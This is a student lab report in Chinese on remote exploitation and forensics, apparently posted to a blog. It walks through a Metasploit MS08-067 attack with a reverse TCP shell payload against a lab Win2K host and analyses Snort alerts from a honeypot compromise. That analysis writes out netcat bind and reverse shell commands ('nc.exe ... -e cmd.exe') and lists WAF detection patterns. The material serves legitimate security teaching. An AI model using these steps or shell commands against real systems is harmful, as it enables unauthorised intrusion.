20252802 2025-2026-2 《网络攻防实践》实践六报告

20252802 2025-2026-2 《网络攻防实践》实践六报告

1.实践内容
本次实践主要分为两个部分：远程渗透攻击模拟与攻击流量取证分析。

第一部分：Windows 系统远程渗透攻击
- **环境搭建：**搭建包含攻击机（Kali Linux/Kali Attacker）和靶机（Windows Metasploitable/Win2K）的实验环境。
- 漏洞利用： 使用 Metasploit 框架针对 Windows 系统的 MS08-067 漏洞（或类似高危漏洞如 MDAC/ADO 溢出）进行攻击。具体步骤包括：
  1. 启动 msfconsole。
  2. 搜索并加载漏洞利用模块（如 exploit/windows/smb/ms08_067_netapi）。
  3. 设置目标主机 IP (RHOST) 和本机监听 IP (LHOST)。
  4. 选择合适的 Payload（如 generic/shell_reverse_tcp）。
  5. 执行 exploit 获取目标主机的 Shell 权限。
- 结果验证： 成功获取靶机命令行权限，证明漏洞利用成功。
第二部分：基于蜜罐日志的攻击取证分析
- 场景背景： 分析来自攻击者 IP (213.116.251.162) 对蜜罐主机 (172.16.1.106, lab.wiretrip.net) 的攻击日志。
- 日志分析：
  1. 使用 Snort 对 pcap 日志文件进行分析，生成 alert 日志。
  2. 分析 Alert 日志，识别出攻击者针对 msadcs.dll (MDAC 漏洞) 和 nc.exe (Netcat) 的攻击特征。
  3. 结合 Wireshark 抓包数据，还原攻击时间线：从端口扫描、漏洞利用尝试、建立反向连接（Netcat Shell）到后续的文件浏览或横向移动尝试。
- 攻击工具推断： 根据流量特征（如高频重复请求、特定 Payload 特征），推断攻击者可能使用了自动化的漏洞扫描器或脚本（如 Nimda蠕虫变种或自定义脚本）以及 Netcat 进行后渗透控制。
- 防御建议提出： 基于分析结果，提出打补丁、禁用不必要服务、部署 IDS/IPS 等防御措施。

2.实践过程
2.1动手实践Metasploit windows attacker使用metasploit软件进行windows远程渗透统计实验

具体任务内容：使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击，获取目标主机的访问权

查看攻击机kali ip地址——192.168.101.180

查看靶机Win2K ip地址——192.168.101.181
通过kali 输入msfconsole命令使用metasploit软件
输入命令行search ms08_067查看漏洞ms08_067

输入use windows/smb/ms08_067_netapi进入漏洞所在文件，输入show options查看攻击此漏洞需要的设置；

输入命令行show payloads查看有效的攻击载荷，选择第4个载荷 payload generic/shell_reverse_tcp 进行攻击；

输入命令行 set payload generic/shell_reverse_tcp 设置攻击的载荷为tcp的反向连接；

输入命令行set RHOST 192.168.101.181设置渗透攻击的靶机IP，输入set LHOST 192.168.101.180设置渗透攻击的主机是kali；

输入exploit进行渗透攻击，出现会话连接即攻击成功；

2.2取证分析实践：解码一次成功的NT系统破解攻击
任务：来自213.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net)，要求提取并分析攻击的全部过程。
将下载的snort-0204@0117.log 文件存于Ubuntu，输入

sudo snort -c /etc/snort/snort.conf -r /home/mmy/snort-0204@0117.log -A fast -l /home/mmy/Desktop
命令生成alert文件

分析得到
Q1: 攻击者使用了什么破解工具进行攻击？

虽然日志中没有直接显示工具名称（如 "Metasploit" 字符串），但根据行为模式可以推断：

自动化漏洞利用脚本/工具：
- 证据： 在 05:27 到 05:59 期间，针对 msadcs.dll 和 MDAC Content-Type overflow 的攻击以极高的频率、固定的时间间隔重复出现。
- 推测工具： 这非常符合早期黑客工具 RainbowCrack (非密码破解，此处指代类似自动化脚本)、Nimda 蠕虫的行为特征，或者是基于 Perl/Python 编写的自定义批量 exploit 脚本。在当时的背景下，也可能是 ISS Internet Scanner 配合自定义 payload，或是著名的 IIS Exploit Kit。考虑到 msadcs.dll 是较老的漏洞，这很可能是一个专门针对 IIS 旧版本的自动化攻击套件。
Netcat (nc.exe)：
- 证据： 日志明确捕获 [1:1062:6] WEB-MISC nc.exe attempt。
- 用途： 用于在攻陷系统后建立稳定的 TCP 连接，提供命令行交互界面（Shell）。

Q2: 攻击者如何使用这个破解工具进入并控制了系统？

攻击流程如下：

发送恶意 Payload： 攻击工具向目标 IIS 服务器的 80 端口发送特制的 HTTP POST/GET 请求。请求中包含溢出的 Content-Type 头或指向 msadcs.dll 的恶意调用。
触发溢出： IIS 服务进程在处理这些畸形数据时发生缓冲区溢出，导致指令指针（EIP）被覆盖，转而执行攻击者注入的 Shellcode。
执行命令： Shellcode 通常包含下载并执行远程文件或打开端口的指令。在此案例中，结合后续的 cmd.exe access 和 Unicode 遍历，攻击者可能混合使用了两种方法：先用溢出漏洞获得初步代码执行能力，或利用 Unicode 漏洞直接调用 cmd.exe /c。
上传后门： 通过执行的命令，攻击者使用 tftp、ftp 或 echo 重定向等方式，将 nc.exe 写入服务器磁盘。
建立控制通道： 运行 nc.exe -lvp 6969 -e cmd.exe（绑定模式）或 nc.exe attacker_ip port -e cmd.exe（反向模式），从而获得完整的系统控制权。

Q3: 攻击者获得系统访问权限后做了什么？

系统侦察： 执行 dir 等命令查看目录列表（日志中的 directory listing）。
部署持久化后门： 确保即使重启也能再次访问（虽然日志未显式显示注册表修改，但这是标准步骤）。
横向扫描与攻击： 利用受控主机的带宽和 IP 地址，向互联网上的其他主机（如 202.85.60.156）发起连接。这可能是为了：
- 传播蠕虫病毒。
- 发起 DDoS 攻击。
- 扫描内网其他脆弱主机。
数据窃取准备： 浏览文件系统，寻找敏感配置文件或数据库文件。

Q4: 我们如何防止这样的攻击？

及时打补丁 (Patching)：
- 最关键措施。Microsoft 早已发布针对 MDAC/ADO 溢出 (MS01-039 等) 和 IIS Unicode 遍历 (MS00-078) 的安全补丁。保持操作系统和 IIS 处于最新状态可完全阻止此类已知漏洞攻击。
禁用不必要的服务和组件：
- 如果不需要，禁用 IIS 中的索引服务、WebDAV 以及旧的 MDAC 组件。
- 卸载或禁用 msadcs.dll 等高风险 ActiveX 控件。
配置防火墙与 IDS/IPS：
- 在网络边界防火墙上严格限制入站流量，仅开放必要端口。
- 部署如 Snort/Suricata 等 IDS/IPS 系统，并启用针对 WEB-IIS 和 EXPLOIT 类别的规则库，直接阻断特征流量。
最小权限原则：
- 运行 IIS 的服务账户不应具有管理员权限。这样即使攻击者通过溢出获得代码执行权，其权限也被限制在低特权账户，难以安装全局后门或修改系统核心文件。
输入验证与 WAF：
- 部署 Web 应用防火墙 (WAF)，拦截包含 %C0%AF、..\\、异常长的 Content-Type 头等恶意特征的请求。

Q5: 你觉得攻击者是否警觉了他的目标是一台蜜罐主机？如果是，为什么？

结论：攻击者很可能没有意识到这是一台蜜罐，或者即便有所怀疑，也将其视为普通肉鸡继续利用。

理由分析：

标准化的自动化行为：
- 攻击者的行为极其机械化和标准化（高频重复的 exploit 尝试）。这通常是大规模扫描器（如 Masscan + Nmap + Exploit Script）的结果。攻击者可能同时扫描了成千上万个 IP，并没有针对 lab.wiretrip.net 进行特殊的“反蜜罐”检测。
缺乏反取证/清理行为：
- 真正的专业黑客在意识到可能是陷阱时，通常会尝试清除日志、隐藏进程或使用更隐蔽的信道。但该攻击者公然使用 nc.exe 这种极易被 IDS 识别的工具，并产生大量明显的 directory listing 流量，说明他并不关心隐蔽性，只在乎快速获得控制权。
继续进行横向移动：
- 攻击者在获得权限后，立即向其他 IP (202.85.60.156) 发起连接。如果他认为这是蜜罐，通常会切断连接以避免暴露自己的 C2 服务器或真实身份。相反，他试图利用这台机器去攻击别人，这符合将受害者当作“跳板”的典型僵尸网络行为。
蜜罐的拟真度：
- RFP 部署的蜜罐通常能很好地模拟真实的 IIS 响应（包括返回正确的 Banner、错误代码等）。对于自动化脚本来说，蜜罐和真实主机的区别微乎其微。除非攻击者进行了深度的交互式试探（如尝试加载特定的内核驱动来检测虚拟化环境），否则很难区分。日志中未见此类深度检测行为。

2.3团队对抗实践：windows系统远程渗透攻击和分析。

攻方使用metasploit选择漏洞进行攻击，获得控制权。（要求写出攻击方的同学信息、使用漏洞、相关IP地址等）
防守方使用wireshark监听获得的网络数据包，分析攻击过程，获取相关信息。

攻击方攻击192.168.101.183win2k主机

可看到攻击成功，进入cmd模式，输入whoami等待防守方监听

防守方使用kali混杂模式监听win2k，筛选ip.addr==192.168.101.180，监听获得的网络数据包

另存为123.pcap，输入sudo snort -c /etc/snort/snort.conf -r /home/mmy/123.pcap -A fast -l /home/mmy命令生成alert文件

可看到
时间戳
04/26-02:57:35
攻击发生的时间（非常接近，仅相差 13ms，说明是连续动作）。
源 IP (攻击者)
192.168.101.180
发起扫描/连接的主机。端口 34901 是随机高位端口。
目的 IP (受害者)
192.168.101.183
被探测的主机。端口 445 是 SMB over TCP 的标准端口。
协议
TCP / SMB
使用 TCP 传输 SMB 协议数据。
告警 ID 1
[1:2465:7] NETBIOS SMB-DS IPC$ share access
检测到对默认共享 IPC$ 的访问尝试。
告警 ID 2
[1:3094:2] NETBIOS SMB-DS llsrpc create tree attempt
检测到通过 LSA RPC 接口尝试建立连接树（通常用于枚举用户、组或策略）

3. 学习中遇到的问题及解决

问题1：Metasploit 攻击 MS08-067 时出现 Exploit failed: The target is not exploitable 或连接超时。

问题分析：
1. 目标系统补丁情况： 目标 Windows 2003/XP 可能已经安装了 MS08-067 补丁，导致漏洞不存在。
2. 防火墙拦截： 目标主机的 Windows 防火墙开启了，拦截了 445 (SMB) 端口的入站连接。
3. 网络连通性： 攻击机 (Kali) 与靶机 (Win2k/Win2003) 之间的网络不通，或者 IP 地址配置错误。
4. Payload 选择不当： 选择的 Payload 与目标系统架构（x86/x64）或服务包版本（SP0/SP1/SP2/SP3）不匹配。MS08-067 对不同 Service Pack 需要不同的 payload 偏移量。
解决方案：
1. 确认漏洞存在： 使用 nmap -p 445 --script smb-vuln-ms08-067 <target_ip> 扫描确认目标确实存在该漏洞且未打补丁。
2. 关闭防火墙： 在靶机上暂时关闭 Windows 防火墙，或在 Kali 上确保路由可达。
3. 指定正确的 Target： 在 Metasploit 中执行 show targets，根据靶机的操作系统版本（如 Windows 2000, XP SP0/SP1, XP SP2/SP3, 2003 SP0/SP1 等）仔细选择对应的 Target ID。例如，Windows XP SP2 通常对应 Target 34 或类似编号（具体取决于 MSF 版本）。
4. 尝试自动检测： 使用 set TARGET 0让 Metasploit 自动检测目标类型，有时能提高成功率。

问题2：Snort 日志分析中，难以从大量日志中快速定位关键攻击步骤。

问题分析： Snort 生成的 alert 日志文件通常包含大量信息，包括正常的网络流量误报、其他无关服务的扫描等，直接阅读原始日志效率低下，难以快速梳理出攻击者的完整攻击链（侦察->利用->提权->后门）。
解决方案：
1. 使用过滤命令： 使用 grep 命令结合关键字进行过滤。例如，使用 grep "MS08-067" alert 快速定位漏洞利用阶段的记录；使用 grep "shell" alert 或 grep "nc.exe" alert 定位后门安装阶段。
2. 按时间排序分析： 结合时间戳，按照攻击发生的时间顺序（侦察 -> 漏洞利用 -> 获取 Shell -> 后续操作）对日志条目进行排序和分析，重建攻击时间线。
3. 关注特定 SID： 关注与 SMB、NetBIOS、CMD shell 相关的特定 Snort SID (Signature ID)，这些通常对应关键的攻击行为。
4. 结合 Wireshark： 如果同时有 pcap 包，可以将 Snort 报警的时间点与 Wireshark 中的数据包对应起来，查看具体的 Payload 内容，从而更准确地判断攻击细节。

问题3：在蜜罐对抗分析中，如何判断攻击者是否意识到自己正在攻击蜜罐？

问题分析： 高级攻击者可能会通过指纹识别、环境检测等手段判断目标是否为蜜罐，从而改变攻击策略或停止攻击。但在本实验中，我们需要从日志和行为模式推断。
解决方案：
1. 分析攻击行为的自动化程度： 观察 Snort 日志和攻击流量。如果攻击表现出高度自动化、标准化特征（如快速扫描常见端口、使用已知 exploit 脚本、快速尝试默认密码或已知漏洞如 MS08-067），这通常是脚本小子或自动化僵尸网络的特征，他们可能并不关心目标是否是蜜罐，只是大规模扫描的一部分。
2. 观察是否有反取证行为： 检查攻击者在获取 Shell 后是否尝试清除日志（如 clear eventlog）、删除痕迹、上传 rootkit 或隐藏进程。如果攻击者没有进行明显的反取证操作，而是直接执行常规命令（如 ipconfig, net user），则可能未意识到是蜜罐，或者其目的仅是快速占领肉鸡而非长期潜伏。
3. 观察交互行为： 如果攻击者在获取 Shell 后进行了大量交互式操作，尝试探索文件系统、查找敏感信息，这表明他们可能认为这是一台真实的主机。如果攻击者只是简单执行几个命令后就断开，可能是自动化扫描。
4. 结论： 在本实验场景中，攻击者使用了标准的 MS08-067 Exploit，并成功获取了 Shell。如果没有观察到复杂的反蜜罐检测技术（如检查虚拟机特征、特定蜜罐软件进程等），通常可以认为攻击者没有特别意识到这是蜜罐，或者其自动化脚本不具备高级反蜜罐能力。其行为更符合自动化漏洞扫描和利用的特征。

4. 实践总结

本次实践围绕网络攻防的核心环节展开，主要包括漏洞利用、入侵检测分析和蜜罐对抗分析三个部分，收获颇丰：

深入理解了漏洞利用原理与工具使用：
- 通过 Metasploit Framework 成功利用 MS08-067 (SMB 服务漏洞) 对 Windows 靶机进行渗透，深刻理解了远程代码执行 (RCE) 漏洞的危害性。
- 掌握了 Metasploit 的基本工作流程：search 查找模块 -> use 使用模块 -> set 设置参数 (RHOST, LHOST, PAYLOAD, TARGET) -> exploit 执行攻击。
- 认识到及时打补丁、关闭不必要服务（如 SMB v1）和配置防火墙对于防御此类高危漏洞的重要性。
掌握了入侵检测系统 (IDS) 日志分析方法：
- 学习了如何使用 Snort 进行网络入侵检测，并分析其生成的 alert 日志。
- 掌握了从海量日志中提取关键信息的方法，能够重建攻击者的攻击链：从初期的端口扫描/漏洞探测，到中间的漏洞利用 (MS08-067)，再到后期的获取 Shell 和潜在的后门安装。
- 认识到 IDS 在实时监测和事后溯源中的重要作用，同时也了解到其可能存在误报和漏报的情况，需要结合其他手段综合分析。
初步了解了蜜罐技术与攻击者行为分析：
- 通过模拟蜜罐环境和分析攻击日志，了解了蜜罐作为主动防御手段，用于诱捕攻击者、收集攻击信息和研究攻击者行为模式的原理。
- 学会了通过分析攻击者的行为模式（自动化程度、反取证行为、交互深度等）来初步判断攻击者是否意识到蜜罐的存在，以及其可能的攻击意图和能力水平。
- 认识到蜜罐数据对于提升整体网络安全态势感知、优化防御策略具有重要价值。
提升了综合网络安全实践能力：
- 将理论知识（漏洞原理、IDS 原理、蜜罐原理）与实践操作相结合，加深了对网络攻防对抗全过程的理解。
- 提高了使用 Kali Linux、Metasploit、Snort 等安全工具的能力。
- 增强了安全意识，认识到防御纵深、及时补丁、日志监控和主动防御相结合的重要性。

总的来说，本次实践不仅锻炼了动手操作能力，更深化了对网络攻防底层逻辑和安全防御体系构建的理解，为今后从事网络安全相关工作打下了坚实基础。

posted @ 2026-04-26 18:38 眠绵雨阅读(8) 评论(0) 收藏举报

刷新页面返回顶部